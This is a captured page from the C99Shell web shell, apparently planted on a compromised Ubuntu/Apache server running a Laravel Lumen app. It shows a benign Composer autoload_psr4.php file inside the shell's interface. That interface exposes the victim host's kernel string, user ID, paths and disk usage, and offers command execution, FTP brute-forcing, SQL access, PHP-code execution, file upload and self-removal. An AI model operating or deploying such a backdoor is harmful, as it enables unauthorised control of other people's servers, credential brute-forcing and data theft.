!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/notification/vendor/composer/   drwxr-xr-x
Free 13.29 GB of 57.97 GB (22.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     autoload_psr4.php (6.32 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

// autoload_psr4.php @generated by Composer

$vendorDir dirname(dirname(__FILE__));
$baseDir dirname($vendorDir);

return array(
    
'voku\\' => array($vendorDir '/voku/portable-ascii/src/voku'),
    
'phpDocumentor\\Reflection\\' => array($vendorDir '/phpdocumentor/reflection-common/src'$vendorDir '/phpdocumentor/type-resolver/src'$vendorDir '/phpdocumentor/reflection-docblock/src'),
    
'Webmozart\\Assert\\' => array($vendorDir '/webmozart/assert/src'),
    
'Tests\\' => array($baseDir '/tests'),
    
'Symfony\\Polyfill\\Php81\\' => array($vendorDir '/symfony/polyfill-php81'),
    
'Symfony\\Polyfill\\Php80\\' => array($vendorDir '/symfony/polyfill-php80'),
    
'Symfony\\Polyfill\\Php72\\' => array($vendorDir '/symfony/polyfill-php72'),
    
'Symfony\\Polyfill\\Mbstring\\' => array($vendorDir '/symfony/polyfill-mbstring'),
    
'Symfony\\Polyfill\\Intl\\Normalizer\\' => array($vendorDir '/symfony/polyfill-intl-normalizer'),
    
'Symfony\\Polyfill\\Intl\\Idn\\' => array($vendorDir '/symfony/polyfill-intl-idn'),
    
'Symfony\\Polyfill\\Intl\\Grapheme\\' => array($vendorDir '/symfony/polyfill-intl-grapheme'),
    
'Symfony\\Polyfill\\Ctype\\' => array($vendorDir '/symfony/polyfill-ctype'),
    
'Symfony\\Contracts\\Translation\\' => array($vendorDir '/symfony/translation-contracts'),
    
'Symfony\\Contracts\\Service\\' => array($vendorDir '/symfony/service-contracts'),
    
'Symfony\\Contracts\\EventDispatcher\\' => array($vendorDir '/symfony/event-dispatcher-contracts'),
    
'Symfony\\Component\\VarDumper\\' => array($vendorDir '/symfony/var-dumper'),
    
'Symfony\\Component\\Translation\\' => array($vendorDir '/symfony/translation'),
    
'Symfony\\Component\\String\\' => array($vendorDir '/symfony/string'),
    
'Symfony\\Component\\Process\\' => array($vendorDir '/symfony/process'),
    
'Symfony\\Component\\Mime\\' => array($vendorDir '/symfony/mime'),
    
'Symfony\\Component\\HttpKernel\\' => array($vendorDir '/symfony/http-kernel'),
    
'Symfony\\Component\\HttpFoundation\\' => array($vendorDir '/symfony/http-foundation'),
    
'Symfony\\Component\\Finder\\' => array($vendorDir '/symfony/finder'),
    
'Symfony\\Component\\EventDispatcher\\' => array($vendorDir '/symfony/event-dispatcher'),
    
'Symfony\\Component\\ErrorHandler\\' => array($vendorDir '/symfony/error-handler'),
    
'Symfony\\Component\\Console\\' => array($vendorDir '/symfony/console'),
    
'Ramsey\\Uuid\\' => array($vendorDir '/ramsey/uuid/src'),
    
'Ramsey\\Collection\\' => array($vendorDir '/ramsey/collection/src'),
    
'Psr\\SimpleCache\\' => array($vendorDir '/psr/simple-cache/src'),
    
'Psr\\Log\\' => array($vendorDir '/psr/log/src'),
    
'Psr\\EventDispatcher\\' => array($vendorDir '/psr/event-dispatcher/src'),
    
'Psr\\Container\\' => array($vendorDir '/psr/container/src'),
    
'Prophecy\\' => array($vendorDir '/phpspec/prophecy/src/Prophecy'),
    
'PhpParser\\' => array($vendorDir '/nikic/php-parser/lib/PhpParser'),
    
'PhpOption\\' => array($vendorDir '/phpoption/phpoption/src/PhpOption'),
    
'Monolog\\' => array($vendorDir '/monolog/monolog/src/Monolog'),
    
'Laravel\\SerializableClosure\\' => array($vendorDir '/laravel/serializable-closure/src'),
    
'Laravel\\Lumen\\' => array($vendorDir '/laravel/lumen-framework/src'),
    
'Illuminate\\View\\' => array($vendorDir '/illuminate/view'),
    
'Illuminate\\Validation\\' => array($vendorDir '/illuminate/validation'),
    
'Illuminate\\Translation\\' => array($vendorDir '/illuminate/translation'),
    
'Illuminate\\Testing\\' => array($vendorDir '/illuminate/testing'),
    
'Illuminate\\Support\\' => array($vendorDir '/illuminate/conditionable'$vendorDir '/illuminate/macroable'$vendorDir '/illuminate/collections'$vendorDir '/illuminate/support'),
    
'Illuminate\\Session\\' => array($vendorDir '/illuminate/session'),
    
'Illuminate\\Queue\\' => array($vendorDir '/illuminate/queue'),
    
'Illuminate\\Pipeline\\' => array($vendorDir '/illuminate/pipeline'),
    
'Illuminate\\Pagination\\' => array($vendorDir '/illuminate/pagination'),
    
'Illuminate\\Log\\' => array($vendorDir '/illuminate/log'),
    
'Illuminate\\Http\\' => array($vendorDir '/illuminate/http'),
    
'Illuminate\\Hashing\\' => array($vendorDir '/illuminate/hashing'),
    
'Illuminate\\Filesystem\\' => array($vendorDir '/illuminate/filesystem'),
    
'Illuminate\\Events\\' => array($vendorDir '/illuminate/events'),
    
'Illuminate\\Encryption\\' => array($vendorDir '/illuminate/encryption'),
    
'Illuminate\\Database\\' => array($vendorDir '/illuminate/database'),
    
'Illuminate\\Contracts\\' => array($vendorDir '/illuminate/contracts'),
    
'Illuminate\\Container\\' => array($vendorDir '/illuminate/container'),
    
'Illuminate\\Console\\' => array($vendorDir '/illuminate/console'),
    
'Illuminate\\Config\\' => array($vendorDir '/illuminate/config'),
    
'Illuminate\\Cache\\' => array($vendorDir '/illuminate/cache'),
    
'Illuminate\\Bus\\' => array($vendorDir '/illuminate/bus'),
    
'Illuminate\\Broadcasting\\' => array($vendorDir '/illuminate/broadcasting'),
    
'Illuminate\\Auth\\' => array($vendorDir '/illuminate/auth'),
    
'GrahamCampbell\\ResultType\\' => array($vendorDir '/graham-campbell/result-type/src'),
    
'Fruitcake\\Cors\\' => array($vendorDir '/fruitcake/php-cors/src'),
    
'FastRoute\\' => array($vendorDir '/nikic/fast-route/src'),
    
'Faker\\' => array($vendorDir '/fakerphp/faker/src/Faker'),
    
'Egulias\\EmailValidator\\' => array($vendorDir '/egulias/email-validator/src'),
    
'Dotenv\\' => array($vendorDir '/vlucas/phpdotenv/src'),
    
'Doctrine\\Instantiator\\' => array($vendorDir '/doctrine/instantiator/src/Doctrine/Instantiator'),
    
'Doctrine\\Inflector\\' => array($vendorDir '/doctrine/inflector/lib/Doctrine/Inflector'),
    
'Doctrine\\Common\\Lexer\\' => array($vendorDir '/doctrine/lexer/lib/Doctrine/Common/Lexer'),
    
'DeepCopy\\' => array($vendorDir '/myclabs/deep-copy/src/DeepCopy'),
    
'Database\\Seeders\\' => array($baseDir '/database/seeders'),
    
'Database\\Factories\\' => array($baseDir '/database/factories'),
    
'Cron\\' => array($vendorDir '/dragonmantank/cron-expression/src/Cron'),
    
'Carbon\\' => array($vendorDir '/nesbot/carbon/src/Carbon'),
    
'Brick\\Math\\' => array($vendorDir '/brick/math/src'),
    
'App\\' => array($baseDir '/app'),
);

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.053 ]--